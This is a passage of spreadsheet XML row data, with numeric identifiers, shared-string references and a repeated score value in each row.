    <row r="12857" ht="15.75" customHeight="1">
      <c r="A12857" s="1">
        <v>12911.0</v>
      </c>
      <c r="B12857" s="2">
        <v>3.2155868E7</v>
      </c>
      <c r="C12857" s="2" t="s">
        <v>12366</v>
      </c>
      <c r="D12857" s="2">
        <v>1.0</v>
      </c>
      <c r="E12857" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12857" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12858" ht="15.75" customHeight="1">
      <c r="A12858" s="1">
        <v>13122.0</v>
      </c>
      <c r="B12858" s="2">
        <v>3.3629816E7</v>
      </c>
      <c r="C12858" s="2" t="s">
        <v>12367</v>
      </c>
      <c r="D12858" s="2">
        <v>1.0</v>
      </c>
      <c r="E12858" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12858" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12859" ht="15.75" customHeight="1">
      <c r="A12859" s="1">
        <v>13185.0</v>
      </c>
      <c r="B12859" s="2">
        <v>3.40575E7</v>
      </c>
      <c r="C12859" s="2" t="s">
        <v>12368</v>
      </c>
      <c r="D12859" s="2">
        <v>1.0</v>
      </c>
      <c r="E12859" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12859" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12860" ht="15.75" customHeight="1">
      <c r="A12860" s="1">
        <v>13573.0</v>
      </c>
      <c r="B12860" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C12860" s="2" t="s">
        <v>12369</v>
      </c>
      <c r="D12860" s="2">
        <v>1.0</v>
      </c>
      <c r="E12860" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12860" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12861" ht="15.75" customHeight="1">
      <c r="A12861" s="1">
        <v>14136.0</v>
      </c>
      <c r="B12861" s="2">
        <v>3.7917609E7</v>
      </c>
      <c r="C12861" s="2" t="s">
        <v>12370</v>
      </c>
      <c r="D12861" s="2">
        <v>1.0</v>
      </c>
      <c r="E12861" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12861" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12862" ht="15.75" customHeight="1">
      <c r="A12862" s="1">
        <v>14342.0</v>
      </c>
      <c r="B12862" s="2">
        <v>3.8836456E7</v>
      </c>
      <c r="C12862" s="2" t="s">
        <v>12371</v>
      </c>
      <c r="D12862" s="2">
        <v>1.0</v>
      </c>
      <c r="E12862" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12862" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12863" ht="15.75" customHeight="1">
      <c r="A12863" s="1">
        <v>14402.0</v>
      </c>
      <c r="B12863" s="2">
        <v>3.9185523E7</v>
      </c>
      <c r="C12863" s="2" t="s">
        <v>12372</v>
      </c>
      <c r="D12863" s="2">
        <v>1.0</v>
      </c>
      <c r="E12863" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12863" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12864" ht="15.75" customHeight="1">
      <c r="A12864" s="1">
        <v>14448.0</v>
      </c>
      <c r="B12864" s="2">
        <v>3.9372555E7</v>
      </c>
      <c r="C12864" s="5" t="s">
        <v>12283</v>
      </c>
      <c r="D12864" s="2">
        <v>1.0</v>
      </c>
      <c r="E12864" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12864" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12865" ht="15.75" customHeight="1">
      <c r="A12865" s="1">
        <v>14942.0</v>
      </c>
      <c r="B12865" s="2">
        <v>4.1253568E7</v>
      </c>
      <c r="C12865" s="2" t="s">
        <v>12373</v>
      </c>
      <c r="D12865" s="2">
        <v>1.0</v>
      </c>
      <c r="E12865" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12865" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12866" ht="15.75" customHeight="1">
      <c r="A12866" s="1">
        <v>15032.0</v>
      </c>
      <c r="B12866" s="2">
        <v>4.1555772E7</v>
      </c>
      <c r="C12866" s="2" t="s">
        <v>12374</v>
      </c>
      <c r="D12866" s="2">
        <v>1.0</v>
      </c>
      <c r="E12866" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12866" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12867" ht="15.75" customHeight="1">
      <c r="A12867" s="1">
        <v>16067.0</v>
      </c>
      <c r="B12867" s="2">
        <v>4.5306531E7</v>
      </c>
      <c r="C12867" s="2" t="s">
        <v>12375</v>
      </c>
      <c r="D12867" s="2">
        <v>1.0</v>
      </c>
      <c r="E12867" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12867" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12868" ht="15.75" customHeight="1">
      <c r="A12868" s="1">
        <v>16150.0</v>
      </c>
      <c r="B12868" s="2">
        <v>4.5577183E7</v>
      </c>
      <c r="C12868" s="2" t="s">
        <v>12376</v>
      </c>
      <c r="D12868" s="2">
        <v>1.0</v>
      </c>
      <c r="E12868" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12868" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12869" ht="15.75" customHeight="1">
      <c r="A12869" s="1">
        <v>16477.0</v>
      </c>
      <c r="B12869" s="2">
        <v>4.6510709E7</v>
      </c>
      <c r="C12869" s="2" t="s">
        <v>12377</v>
      </c>
      <c r="D12869" s="2">
        <v>1.0</v>
      </c>
      <c r="E12869" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12869" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12870" ht="15.75" customHeight="1">
      <c r="A12870" s="1">
        <v>17448.0</v>
      </c>
      <c r="B12870" s="2">
        <v>4.9792301E7</v>
      </c>
      <c r="C12870" s="2" t="s">
        <v>12378</v>
      </c>
      <c r="D12870" s="2">
        <v>1.0</v>
      </c>
      <c r="E12870" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12870" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12871" ht="15.75" customHeight="1">
      <c r="A12871" s="1">
        <v>17809.0</v>
      </c>
      <c r="B12871" s="2">
        <v>5.0847378E7</v>
      </c>
      <c r="C12871" s="2" t="s">
        <v>12379</v>
      </c>
      <c r="D12871" s="2">
        <v>1.0</v>
      </c>
      <c r="E12871" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12871" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12872" ht="15.75" customHeight="1">
      <c r="A12872" s="1">
        <v>18298.0</v>
      </c>
      <c r="B12872" s="2">
        <v>5.2320699E7</v>
      </c>
      <c r="C12872" s="2" t="s">
        <v>12380</v>
      </c>
      <c r="D12872" s="2">
        <v>1.0</v>
      </c>
      <c r="E12872" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12872" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12873" ht="15.75" customHeight="1">
      <c r="A12873" s="1">
        <v>18717.0</v>
      </c>
      <c r="B12873" s="2">
        <v>5.3669007E7</v>
      </c>
      <c r="C12873" s="2" t="s">
        <v>12381</v>
      </c>
      <c r="D12873" s="2">
        <v>1.0</v>
      </c>
      <c r="E12873" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12873" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12874" ht="15.75" customHeight="1">
      <c r="A12874" s="1">
        <v>18854.0</v>
      </c>
      <c r="B12874" s="2">
        <v>5.3981727E7</v>
      </c>
      <c r="C12874" s="2" t="s">
        <v>12382</v>
      </c>
      <c r="D12874" s="2">
        <v>1.0</v>
      </c>
      <c r="E12874" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12874" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12875" ht="15.75" customHeight="1">
      <c r="A12875" s="1">
        <v>19019.0</v>
      </c>
      <c r="B12875" s="2">
        <v>5.4529378E7</v>
      </c>
      <c r="C12875" s="2" t="s">
        <v>12383</v>
      </c>
      <c r="D12875" s="2">
        <v>1.0</v>
      </c>
      <c r="E12875" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12875" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12876" ht="15.75" customHeight="1">
      <c r="A12876" s="1">
        <v>19672.0</v>
      </c>
      <c r="B12876" s="2">
        <v>5.6388719E7</v>
      </c>
      <c r="C12876" s="2" t="s">
        <v>12384</v>
      </c>
      <c r="D12876" s="2">
        <v>1.0</v>
      </c>
      <c r="E12876" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12876" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12877" ht="15.75" customHeight="1">
      <c r="A12877" s="1">
        <v>19806.0</v>
      </c>
      <c r="B12877" s="2">
        <v>5.6895474E7</v>
      </c>
      <c r="C12877" s="2" t="s">
        <v>12385</v>
      </c>
      <c r="D12877" s="2">
        <v>1.0</v>
      </c>
      <c r="E12877" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12877" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12878" ht="15.75" customHeight="1">
      <c r="A12878" s="1">
        <v>19837.0</v>
      </c>
      <c r="B12878" s="2">
        <v>5.7059731E7</v>
      </c>
      <c r="C12878" s="2" t="s">
        <v>12386</v>
      </c>
      <c r="D12878" s="2">
        <v>1.0</v>
      </c>
      <c r="E12878" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12878" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12879" ht="15.75" customHeight="1">
      <c r="A12879" s="1">
        <v>19965.0</v>
      </c>
      <c r="B12879" s="2">
        <v>5.755251E7</v>
      </c>
      <c r="C12879" s="2" t="s">
        <v>12387</v>
      </c>
      <c r="D12879" s="2">
        <v>1.0</v>
      </c>
      <c r="E12879" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12879" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12880" ht="15.75" customHeight="1">
      <c r="A12880" s="1">
        <v>20176.0</v>
      </c>
      <c r="B12880" s="2">
        <v>1.0453729E7</v>
      </c>
      <c r="C12880" s="2" t="s">
        <v>12388</v>
      </c>
      <c r="D12880" s="2">
        <v>1.0</v>
      </c>
      <c r="E12880" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12880" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12881" ht="15.75" customHeight="1">
      <c r="A12881" s="1">
        <v>20246.0</v>
      </c>
      <c r="B12881" s="2">
        <v>1.0939696E7</v>
      </c>
      <c r="C12881" s="2" t="s">
        <v>12389</v>
      </c>
      <c r="D12881" s="2">
        <v>1.0</v>
      </c>
      <c r="E12881" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12881" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12882" ht="15.75" customHeight="1">
      <c r="A12882" s="1">
        <v>20254.0</v>
      </c>
      <c r="B12882" s="2">
        <v>1.1011457E7</v>
      </c>
      <c r="C12882" s="2" t="s">
        <v>12390</v>
      </c>
      <c r="D12882" s="2">
        <v>1.0</v>
      </c>
      <c r="E12882" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12882" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12883" ht="15.75" customHeight="1">
      <c r="A12883" s="1">
        <v>20502.0</v>
      </c>
      <c r="B12883" s="2">
        <v>1.2930242E7</v>
      </c>
      <c r="C12883" s="2" t="s">
        <v>12391</v>
      </c>
      <c r="D12883" s="2">
        <v>1.0</v>
      </c>
      <c r="E12883" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12883" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12884" ht="15.75" customHeight="1">
      <c r="A12884" s="1">
        <v>21093.0</v>
      </c>
      <c r="B12884" s="2">
        <v>1.8068728E7</v>
      </c>
      <c r="C12884" s="2" t="s">
        <v>12392</v>
      </c>
      <c r="D12884" s="2">
        <v>1.0</v>
      </c>
      <c r="E12884" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12884" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12885" ht="15.75" customHeight="1">
      <c r="A12885" s="1">
        <v>21138.0</v>
      </c>
      <c r="B12885" s="2">
        <v>1.8509542E7</v>
      </c>
      <c r="C12885" s="2" t="s">
        <v>12393</v>
      </c>
      <c r="D12885" s="2">
        <v>1.0</v>
      </c>
      <c r="E12885" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12885" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12886" ht="15.75" customHeight="1">
      <c r="A12886" s="1">
        <v>21230.0</v>
      </c>
      <c r="B12886" s="2">
        <v>1.9660134E7</v>
      </c>
      <c r="C12886" s="2" t="s">
        <v>12394</v>
      </c>
      <c r="D12886" s="2">
        <v>1.0</v>
      </c>
      <c r="E12886" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12886" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12887" ht="15.75" customHeight="1">
      <c r="A12887" s="1">
        <v>21274.0</v>
      </c>
      <c r="B12887" s="2">
        <v>2.0214372E7</v>
      </c>
      <c r="C12887" s="2" t="s">
        <v>12395</v>
      </c>
      <c r="D12887" s="2">
        <v>1.0</v>
      </c>
      <c r="E12887" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12887" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12888" ht="15.75" customHeight="1">
      <c r="A12888" s="1">
        <v>21350.0</v>
      </c>
      <c r="B12888" s="2">
        <v>2.1306948E7</v>
      </c>
      <c r="C12888" s="2" t="s">
        <v>12396</v>
      </c>
      <c r="D12888" s="2">
        <v>1.0</v>
      </c>
      <c r="E12888" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12888" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12889" ht="15.75" customHeight="1">
      <c r="A12889" s="1">
        <v>21978.0</v>
      </c>
      <c r="B12889" s="2">
        <v>2.9229719E7</v>
      </c>
      <c r="C12889" s="2" t="s">
        <v>12397</v>
      </c>
      <c r="D12889" s="2">
        <v>1.0</v>
      </c>
      <c r="E12889" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12889" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12890" ht="15.75" customHeight="1">
      <c r="A12890" s="1">
        <v>22018.0</v>
      </c>
      <c r="B12890" s="2">
        <v>2.9975853E7</v>
      </c>
      <c r="C12890" s="2" t="s">
        <v>12398</v>
      </c>
      <c r="D12890" s="2">
        <v>1.0</v>
      </c>
      <c r="E12890" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12890" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12891" ht="15.75" customHeight="1">
      <c r="A12891" s="1">
        <v>22138.0</v>
      </c>
      <c r="B12891" s="2">
        <v>3.1115178E7</v>
      </c>
      <c r="C12891" s="2" t="s">
        <v>12399</v>
      </c>
      <c r="D12891" s="2">
        <v>1.0</v>
      </c>
      <c r="E12891" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12891" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12892" ht="15.75" customHeight="1">
      <c r="A12892" s="1">
        <v>22233.0</v>
      </c>
      <c r="B12892" s="2">
        <v>3.2480612E7</v>
      </c>
      <c r="C12892" s="2" t="s">
        <v>12400</v>
      </c>
      <c r="D12892" s="2">
        <v>1.0</v>
      </c>
      <c r="E12892" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12892" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12893" ht="15.75" customHeight="1">
      <c r="A12893" s="1">
        <v>22609.0</v>
      </c>
      <c r="B12893" s="2">
        <v>3993073.0</v>
      </c>
      <c r="C12893" s="2" t="s">
        <v>12401</v>
      </c>
      <c r="D12893" s="2">
        <v>1.0</v>
      </c>
      <c r="E12893" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12893" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12894" ht="15.75" customHeight="1">
      <c r="A12894" s="1">
        <v>22858.0</v>
      </c>
      <c r="B12894" s="2">
        <v>4.7198259E7</v>
      </c>
      <c r="C12894" s="2" t="s">
        <v>12402</v>
      </c>
      <c r="D12894" s="2">
        <v>1.0</v>
      </c>
      <c r="E12894" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12894" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12895" ht="15.75" customHeight="1">
      <c r="A12895" s="1">
        <v>23003.0</v>
      </c>
      <c r="B12895" s="2">
        <v>4.9746253E7</v>
      </c>
      <c r="C12895" s="2" t="s">
        <v>12403</v>
      </c>
      <c r="D12895" s="2">
        <v>1.0</v>
      </c>
      <c r="E12895" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12895" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12896" ht="15.75" customHeight="1">
      <c r="A12896" s="1">
        <v>23161.0</v>
      </c>
      <c r="B12896" s="2">
        <v>5.1930078E7</v>
      </c>
      <c r="C12896" s="2" t="s">
        <v>12404</v>
      </c>
      <c r="D12896" s="2">
        <v>1.0</v>
      </c>
      <c r="E12896" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12896" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12897" ht="15.75" customHeight="1">
      <c r="A12897" s="1">
        <v>23511.0</v>
      </c>
      <c r="B12897" s="2">
        <v>5826656.0</v>
      </c>
      <c r="C12897" s="2" t="s">
        <v>12405</v>
      </c>
      <c r="D12897" s="2">
        <v>1.0</v>
      </c>
      <c r="E12897" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12897" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12898" ht="15.75" customHeight="1">
      <c r="A12898" s="1">
        <v>23704.0</v>
      </c>
      <c r="B12898" s="2">
        <v>7125507.0</v>
      </c>
      <c r="C12898" s="2" t="s">
        <v>12406</v>
      </c>
      <c r="D12898" s="2">
        <v>1.0</v>
      </c>
      <c r="E12898" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12898" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12899" ht="15.75" customHeight="1">
      <c r="A12899" s="1">
        <v>24121.0</v>
      </c>
      <c r="B12899" s="2">
        <v>1.0010168E7</v>
      </c>
      <c r="C12899" s="2" t="s">
        <v>12407</v>
      </c>
      <c r="D12899" s="2">
        <v>1.0</v>
      </c>
      <c r="E12899" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12899" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12900" ht="15.75" customHeight="1">
      <c r="A12900" s="1">
        <v>24203.0</v>
      </c>
      <c r="B12900" s="2">
        <v>1.0369639E7</v>
      </c>
      <c r="C12900" s="2" t="s">
        <v>12408</v>
      </c>
      <c r="D12900" s="2">
        <v>1.0</v>
      </c>
      <c r="E12900" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12900" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12901" ht="15.75" customHeight="1">
      <c r="A12901" s="1">
        <v>25022.0</v>
      </c>
      <c r="B12901" s="2">
        <v>1.2798494E7</v>
      </c>
      <c r="C12901" s="2" t="s">
        <v>12409</v>
      </c>
      <c r="D12901" s="2">
        <v>1.0</v>
      </c>
      <c r="E12901" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12901" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12902" ht="15.75" customHeight="1">
      <c r="A12902" s="1">
        <v>25246.0</v>
      </c>
      <c r="B12902" s="2">
        <v>1.3382049E7</v>
      </c>
      <c r="C12902" s="2" t="s">
        <v>12410</v>
      </c>
      <c r="D12902" s="2">
        <v>1.0</v>
      </c>
      <c r="E12902" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12902" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12903" ht="15.75" customHeight="1">
      <c r="A12903" s="1">
        <v>25491.0</v>
      </c>
      <c r="B12903" s="2">
        <v>1.4046687E7</v>
      </c>
      <c r="C12903" s="2" t="s">
        <v>12411</v>
      </c>
      <c r="D12903" s="2">
        <v>1.0</v>
      </c>
      <c r="E12903" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12903" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12904" ht="15.75" customHeight="1">
      <c r="A12904" s="1">
        <v>26392.0</v>
      </c>
      <c r="B12904" s="2">
        <v>1.7000246E7</v>
      </c>
      <c r="C12904" s="2" t="s">
        <v>12412</v>
      </c>
      <c r="D12904" s="2">
        <v>1.0</v>
      </c>
      <c r="E12904" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12904" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12905" ht="15.75" customHeight="1">
      <c r="A12905" s="1">
        <v>27065.0</v>
      </c>
      <c r="B12905" s="2">
        <v>2.0378125E7</v>
      </c>
      <c r="C12905" s="2" t="s">
        <v>12413</v>
      </c>
      <c r="D12905" s="2">
        <v>1.0</v>
      </c>
      <c r="E12905" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12905" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12906" ht="15.75" customHeight="1">
      <c r="A12906" s="1">
        <v>27168.0</v>
      </c>
      <c r="B12906" s="2">
        <v>2.0851727E7</v>
      </c>
      <c r="C12906" s="2" t="s">
        <v>12414</v>
      </c>
      <c r="D12906" s="2">
        <v>1.0</v>
      </c>
      <c r="E12906" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12906" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12907" ht="15.75" customHeight="1">
      <c r="A12907" s="1">
        <v>27762.0</v>
      </c>
      <c r="B12907" s="2">
        <v>2.3106738E7</v>
      </c>
      <c r="C12907" s="2" t="s">
        <v>12415</v>
      </c>
      <c r="D12907" s="2">
        <v>1.0</v>
      </c>
      <c r="E12907" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12907" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12908" ht="15.75" customHeight="1">
      <c r="A12908" s="1">
        <v>28101.0</v>
      </c>
      <c r="B12908" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C12908" s="2" t="s">
        <v>12416</v>
      </c>
      <c r="D12908" s="2">
        <v>1.0</v>
      </c>
      <c r="E12908" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12908" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12909" ht="15.75" customHeight="1">
      <c r="A12909" s="1">
        <v>28920.0</v>
      </c>
      <c r="B12909" s="2">
        <v>2.9524788E7</v>
      </c>
      <c r="C12909" s="2" t="s">
        <v>12417</v>
      </c>
      <c r="D12909" s="2">
        <v>1.0</v>
      </c>
      <c r="E12909" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12909" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12910" ht="15.75" customHeight="1">
      <c r="A12910" s="1">
        <v>29009.0</v>
      </c>
      <c r="B12910" s="2">
        <v>2.9975852E7</v>
      </c>
      <c r="C12910" s="2" t="s">
        <v>12398</v>
      </c>
      <c r="D12910" s="2">
        <v>1.0</v>
      </c>
      <c r="E12910" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12910" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12911" ht="15.75" customHeight="1">
      <c r="A12911" s="1">
        <v>29352.0</v>
      </c>
      <c r="B12911" s="2">
        <v>3.152027E7</v>
      </c>
      <c r="C12911" s="2" t="s">
        <v>12418</v>
      </c>
      <c r="D12911" s="2">
        <v>1.0</v>
      </c>
      <c r="E12911" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12911" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12912" ht="15.75" customHeight="1">
      <c r="A12912" s="1">
        <v>29420.0</v>
      </c>
      <c r="B12912" s="2">
        <v>3.2184033E7</v>
      </c>
      <c r="C12912" s="2" t="s">
        <v>1700</v>
      </c>
      <c r="D12912" s="2">
        <v>1.0</v>
      </c>
      <c r="E12912" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12912" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12913" ht="15.75" customHeight="1">
      <c r="A12913" s="1">
        <v>29431.0</v>
      </c>
      <c r="B12913" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C12913" s="2" t="s">
        <v>12419</v>
      </c>
      <c r="D12913" s="2">
        <v>1.0</v>
      </c>
      <c r="E12913" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12913" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12914" ht="15.75" customHeight="1">
      <c r="A12914" s="1">
        <v>29617.0</v>
      </c>
      <c r="B12914" s="2">
        <v>3.3635685E7</v>
      </c>
      <c r="C12914" s="2" t="s">
        <v>12420</v>
      </c>
      <c r="D12914" s="2">
        <v>1.0</v>
      </c>
      <c r="E12914" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12914" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12915" ht="15.75" customHeight="1">
      <c r="A12915" s="1">
        <v>29802.0</v>
      </c>
      <c r="B12915" s="2">
        <v>3.5132622E7</v>
      </c>
      <c r="C12915" s="2" t="s">
        <v>12421</v>
      </c>
      <c r="D12915" s="2">
        <v>1.0</v>
      </c>
      <c r="E12915" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12915" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12916" ht="15.75" customHeight="1">
      <c r="A12916" s="1">
        <v>29917.0</v>
      </c>
      <c r="B12916" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C12916" s="2" t="s">
        <v>12422</v>
      </c>
      <c r="D12916" s="2">
        <v>1.0</v>
      </c>
      <c r="E12916" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12916" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12917" ht="15.75" customHeight="1">
      <c r="A12917" s="1">
        <v>29928.0</v>
      </c>
      <c r="B12917" s="2">
        <v>3607052.0</v>
      </c>
      <c r="C12917" s="2" t="s">
        <v>12423</v>
      </c>
      <c r="D12917" s="2">
        <v>1.0</v>
      </c>
      <c r="E12917" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12917" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12918" ht="15.75" customHeight="1">
      <c r="A12918" s="1">
        <v>30078.0</v>
      </c>
      <c r="B12918" s="2">
        <v>3625318.0</v>
      </c>
      <c r="C12918" s="2" t="s">
        <v>12424</v>
      </c>
      <c r="D12918" s="2">
        <v>1.0</v>
      </c>
      <c r="E12918" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12918" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12919" ht="15.75" customHeight="1">
      <c r="A12919" s="1">
        <v>31536.0</v>
      </c>
      <c r="B12919" s="2">
        <v>5095178.0</v>
      </c>
      <c r="C12919" s="2" t="s">
        <v>12425</v>
      </c>
      <c r="D12919" s="2">
        <v>1.0</v>
      </c>
      <c r="E12919" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12919" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12920" ht="15.75" customHeight="1">
      <c r="A12920" s="1">
        <v>31761.0</v>
      </c>
      <c r="B12920" s="2">
        <v>5.2155161E7</v>
      </c>
      <c r="C12920" s="2" t="s">
        <v>12426</v>
      </c>
      <c r="D12920" s="2">
        <v>1.0</v>
      </c>
      <c r="E12920" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12920" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12921" ht="15.75" customHeight="1">
      <c r="A12921" s="1">
        <v>32107.0</v>
      </c>
      <c r="B12921" s="2">
        <v>5.4078661E7</v>
      </c>
      <c r="C12921" s="2" t="s">
        <v>12427</v>
      </c>
      <c r="D12921" s="2">
        <v>1.0</v>
      </c>
      <c r="E12921" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12921" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12922" ht="15.75" customHeight="1">
      <c r="A12922" s="1">
        <v>32557.0</v>
      </c>
      <c r="B12922" s="2">
        <v>5758004.0</v>
      </c>
      <c r="C12922" s="2" t="s">
        <v>12428</v>
      </c>
      <c r="D12922" s="2">
        <v>1.0</v>
      </c>
      <c r="E12922" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12922" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12923" ht="15.75" customHeight="1">
      <c r="A12923" s="1">
        <v>32655.0</v>
      </c>
      <c r="B12923" s="2">
        <v>5892623.0</v>
      </c>
      <c r="C12923" s="2" t="s">
        <v>12429</v>
      </c>
      <c r="D12923" s="2">
        <v>1.0</v>
      </c>
      <c r="E12923" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12923" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
